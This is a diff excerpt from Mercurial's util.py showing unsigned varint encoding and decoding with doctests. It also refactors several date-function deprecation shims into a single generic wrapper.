4259 4259 except the last has the most significant bit set. The lower 7 bits of
4260 4260 each byte store the integer's binary representation, least significant group
4261 4261 first.
4262 4262
4263 4263 >>> uvarintencode(0)
4264 4264 '\\x00'
4265 4265 >>> uvarintencode(1)
4266 4266 '\\x01'
4267 4267 >>> uvarintencode(127)
4268 4268 '\\x7f'
4269 4269 >>> uvarintencode(1337)
4270 4270 '\\xb9\\n'
4271 4271 >>> uvarintencode(65536)
4272 4272 '\\x80\\x80\\x04'
4273 4273 >>> uvarintencode(-1)
4274 4274 Traceback (most recent call last):
4275 4275 ...
4276 4276 ProgrammingError: negative value for uvarint: -1
4277 4277 """
4278 4278 if value < 0:
4279 4279 raise error.ProgrammingError('negative value for uvarint: %d'
4280 4280 % value)
4281 4281 bits = value & 0x7f
4282 4282 value >>= 7
4283 4283 bytes = []
4284 4284 while value:
4285 4285 bytes.append(pycompat.bytechr(0x80 | bits))
4286 4286 bits = value & 0x7f
4287 4287 value >>= 7
4288 4288 bytes.append(pycompat.bytechr(bits))
4289 4289
4290 4290 return ''.join(bytes)
4291 4291
4292 4292 def uvarintdecodestream(fh):
4293 4293 """Decode an unsigned variable length integer from a stream.
4294 4294
4295 4295 The passed argument is anything that has a ``.read(N)`` method.
4296 4296
4297 4297 >>> try:
4298 4298 ... from StringIO import StringIO as BytesIO
4299 4299 ... except ImportError:
4300 4300 ... from io import BytesIO
4301 4301 >>> uvarintdecodestream(BytesIO(b'\\x00'))
4302 4302 0
4303 4303 >>> uvarintdecodestream(BytesIO(b'\\x01'))
4304 4304 1
4305 4305 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
4306 4306 127
4307 4307 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
4308 4308 1337
4309 4309 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
4310 4310 65536
4311 4311 >>> uvarintdecodestream(BytesIO(b'\\x80'))
4312 4312 Traceback (most recent call last):
4313 4313 ...
4314 4314 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
4315 4315 """
4316 4316 result = 0
4317 4317 shift = 0
4318 4318 while True:
4319 4319 byte = ord(readexactly(fh, 1))
4320 4320 result |= ((byte & 0x7f) << shift)
4321 4321 if not (byte & 0x80):
4322 4322 return result
4323 4323 shift += 7
4324 4324
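# Worked example of the encoding above, using the 1337 doctest value:
# 1337 is 0b10100111001; the low 7 bits are 0b0111001 = 0x39, which becomes
# 0xb9 once the continuation bit is set.  The remaining bits are 0b1010 =
# 10 = 0x0a ('\n'), emitted last with the high bit clear, giving '\xb9\n'.
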
4325 4325 ###
4326 4326 # Deprecation warnings for util.py splitting
4327 4327 ###
4328 4328
4329 def _deprecatedfunc(func, version):
4330 def wrapped(*args, **kwargs):
4331 fn = pycompat.sysbytes(func.__name__)
4332 mn = pycompat.sysbytes(func.__module__)[len('mercurial.'):]
4333 msg = "'util.%s' is deprecated, use '%s.%s'" % (fn, mn, fn)
4334 nouideprecwarn(msg, version)
4335 return func(*args, **kwargs)
4336 wrapped.__name__ = func.__name__
4337 return wrapped
4338
4329 4339 defaultdateformats = dateutil.defaultdateformats
4330
4331 4340 extendeddateformats = dateutil.extendeddateformats
4332
4333 def makedate(*args, **kwargs):
4334 msg = ("'util.makedate' is deprecated, "
4335 "use 'utils.dateutil.makedate'")
4336 nouideprecwarn(msg, "4.6")
4337 return dateutil.makedate(*args, **kwargs)
4338
4339 def datestr(*args, **kwargs):
4340 msg = ("'util.datestr' is deprecated, "
4341 "use 'utils.dateutil.datestr'")
4342 nouideprecwarn(msg, "4.6")
4343 return dateutil.datestr(*args, **kwargs)
4344
4345 def shortdate(*args, **kwargs):
4346 msg = ("'util.shortdate' is deprecated, "
4347 "use 'utils.dateutil.shortdate'")
4348 nouideprecwarn(msg, "4.6")
4349 return dateutil.shortdate(*args, **kwargs)
4350
4351 def parsetimezone(*args, **kwargs):
4352 msg = ("'util.parsetimezone' is deprecated, "
4353 "use 'utils.dateutil.parsetimezone'")
4354 nouideprecwarn(msg, "4.6")
4355 return dateutil.parsetimezone(*args, **kwargs)
4356
4357 def strdate(*args, **kwargs):
4358 msg = ("'util.strdate' is deprecated, "
4359 "use 'utils.dateutil.strdate'")
4360 nouideprecwarn(msg, "4.6")
4361 return dateutil.strdate(*args, **kwargs)
4362
4363 def parsedate(*args, **kwargs):
4364 msg = ("'util.parsedate' is deprecated, "
4365 "use 'utils.dateutil.parsedate'")
4366 nouideprecwarn(msg, "4.6")
4367 return dateutil.parsedate(*args, **kwargs)
4368
4369 def matchdate(*args, **kwargs):
4370 msg = ("'util.matchdate' is deprecated, "
4371 "use 'utils.dateutil.matchdate'")
4372 nouideprecwarn(msg, "4.6")
4373 return dateutil.matchdate(*args, **kwargs)
4341 makedate = _deprecatedfunc(dateutil.makedate, '4.6')
4342 datestr = _deprecatedfunc(dateutil.datestr, '4.6')
4343 shortdate = _deprecatedfunc(dateutil.shortdate, '4.6')
4344 parsetimezone = _deprecatedfunc(dateutil.parsetimezone, '4.6')
4345 strdate = _deprecatedfunc(dateutil.strdate, '4.6')
4346 parsedate = _deprecatedfunc(dateutil.parsedate, '4.6')
4347 matchdate = _deprecatedfunc(dateutil.matchdate, '4.6')